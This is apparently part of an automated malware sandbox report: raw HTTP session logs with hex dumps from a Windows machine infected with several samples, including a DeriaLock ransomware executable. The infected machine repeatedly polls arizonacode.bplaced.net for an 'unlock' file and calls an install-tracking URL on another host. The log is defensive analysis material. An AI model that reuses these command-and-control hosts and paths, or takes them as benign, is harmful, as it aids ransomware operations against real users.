                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                12192.168.2.349689140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                120192.168.2.349786172.217.168.1480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:50:10.726085901 CEST14245OUTGET / HTTP/1.1
                                                                                                                                                Host: google.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                121172.217.168.1480192.168.2.349786C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:50:10.770498991 CEST14246INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:10 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:50:10 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                122192.168.2.349787185.53.177.5380C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:50:12.037893057 CEST14247OUTGET /scripts/new_install.php?owner=6AdwCleaner HTTP/1.1
                                                                                                                                                Host: www.vikingwebscanner.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Sep 29, 2022 14:50:12.054307938 CEST14247INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:12 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 146
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                Sep 29, 2022 14:50:12.259054899 CEST14247INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:12 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 146
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                123192.168.2.349789172.217.168.1480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:50:13.851249933 CEST14248OUTGET / HTTP/1.1
                                                                                                                                                Host: google.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                124172.217.168.1480192.168.2.349789C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:50:13.894345999 CEST14249INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:13 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:50:13 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                125192.168.2.349790162.55.0.13780C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:50:14.734474897 CEST14249OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                126162.55.0.13780192.168.2.349790C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:50:14.757523060 CEST14250INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:14 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=106
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                Connection: Upgrade
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16
                                                                                                                                                Sep 29, 2022 14:50:14.757550955 CEST14252INData Raw: 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 73 61 66 61 72 69 2d 70 69 6e 6e 65 64 2d
                                                                                                                                                Data Ascii: x16" /> <link rel="mask-icon" href="https://www.bplaced.net/safari-pinned-tab.svg" color="#0b5fb4" /> <link rel="shortcut icon" type="image/x-icon" href="https://www.bplaced.net/favicon.ico"> <link rel="stylesheet" type
                                                                                                                                                Sep 29, 2022 14:50:14.757582903 CEST14253INData Raw: 6c 65 2d 73 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 65 20 69 6e 69 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79
                                                                                                                                                Data Ascii: le-sm"> <div class="de init"> <div style="padding: 32% 1em 0 1%;"> Die gewnschte Seite ist nicht auffindbar. </div> <div
                                                                                                                                                Sep 29, 2022 14:50:14.757610083 CEST14254INData Raw: 6d 20 30 20 31 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 65 20 69 6e 69 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65
                                                                                                                                                Data Ascii: m 0 1%;"> <div class="de init"> <a href="https://www.bplaced.net/datenschutz">Datenschutz</a> <a href="https://www.bplaced.net/impressum">Impressum</a>
                                                                                                                                                Sep 29, 2022 14:50:14.757654905 CEST14256INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                Data Ascii: </div> <div class="en"> <div> Sorry, we can&lsquo;t find that page. </div> <div style="padding: 1em 1em
                                                                                                                                                Sep 29, 2022 14:50:14.757682085 CEST14257INData Raw: 67 75 61 67 65 3b 76 61 72 20 70 72 6f 70 73 3d 5b 5f 30 78 64 63 36 30 5b 31 5d 2c 5f 30 78 64 63 36 30 5b 32 5d 2c 5f 30 78 64 63 36 30 5b 33 5d 2c 5f 30 78 64 63 36 30 5b 34 5d 5d 3b 69 66 28 41 72 72 61 79 5b 5f 30 78 64 63 36 30 5b 37 5d 5d
                                                                                                                                                Data Ascii: guage;var props=[_0xdc60[1],_0xdc60[2],_0xdc60[3],_0xdc60[4]];if(Array[_0xdc60[7]](window[_0xdc60[6]][_0xdc60[5]])){for(i= 0;i< window[_0xdc60[6]][_0xdc60[5]][_0xdc60[8]];i++){language= window[_0xdc60[6]][_0xdc60[5]][i];if(language&& language[


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                127192.168.2.349791162.55.0.13780C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:50:15.372291088 CEST14258OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Sep 29, 2022 14:50:16.205147028 CEST14265OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:17.170990944 CEST14273OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:18.337379932 CEST14281OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:19.313313961 CEST14289OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:20.160240889 CEST14297OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:21.213207006 CEST14305OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:22.143178940 CEST14312OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:23.749490976 CEST14320OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:24.409531116 CEST14328OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:25.417577028 CEST14336OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:26.108197927 CEST14344OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:27.204166889 CEST14352OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:28.071696043 CEST14359OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:29.091023922 CEST14367OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:30.206741095 CEST14375OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:31.132781982 CEST14383OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:32.181581020 CEST14391OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:33.030284882 CEST14399OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:34.034821033 CEST14406OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:35.031223059 CEST14414OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:36.119786978 CEST14422OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:37.048186064 CEST14430OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:38.023087025 CEST14438OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:39.038909912 CEST14446OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:40.041781902 CEST14454OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:41.268867970 CEST14462OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:42.327028036 CEST14469OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:43.164359093 CEST14477OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:44.164870024 CEST14485OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:45.162537098 CEST14493OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:46.138906956 CEST14501OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:47.099528074 CEST14509OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:48.160343885 CEST14517OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:49.111691952 CEST14525OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:50.081363916 CEST14532OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:51.117314100 CEST14540OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:52.160114050 CEST14548OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:53.166380882 CEST14556OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:54.091962099 CEST14564OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:55.085396051 CEST14572OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:56.165606022 CEST14580OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:57.124434948 CEST14587OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:58.393838882 CEST14595OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:50:59.244831085 CEST14603OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:51:00.062630892 CEST14611OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:51:01.167289972 CEST14619OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:51:02.148158073 CEST14627OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:51:03.275376081 CEST14635OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:51:04.186570883 CEST14643OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:51:05.101669073 CEST14651OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:51:06.209753036 CEST14658OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:51:07.245273113 CEST14666OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:51:08.258577108 CEST14674OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:51:09.224976063 CEST14682OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:51:10.086466074 CEST14690OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:51:11.129595041 CEST14698OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
